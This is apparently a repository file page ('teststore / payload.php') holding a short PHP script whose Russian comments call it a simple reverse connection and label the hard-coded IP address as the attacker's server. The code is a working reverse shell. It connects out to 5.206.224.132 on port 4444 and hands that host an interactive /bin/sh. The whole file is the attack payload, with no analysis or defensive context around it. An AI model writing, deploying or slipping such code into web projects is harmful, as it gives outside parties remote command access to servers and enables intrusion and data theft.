teststore / payload.php
enotkrutoy's picture
Update payload.php
798a1e7 verified
raw
history blame contribute delete
333 Bytes
<?php
// Пример простого обратного соединения
$ip = '5.206.224.132'; // IP-адрес атакующего сервера
$port = 4444; // Порт для прослушивания
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
?>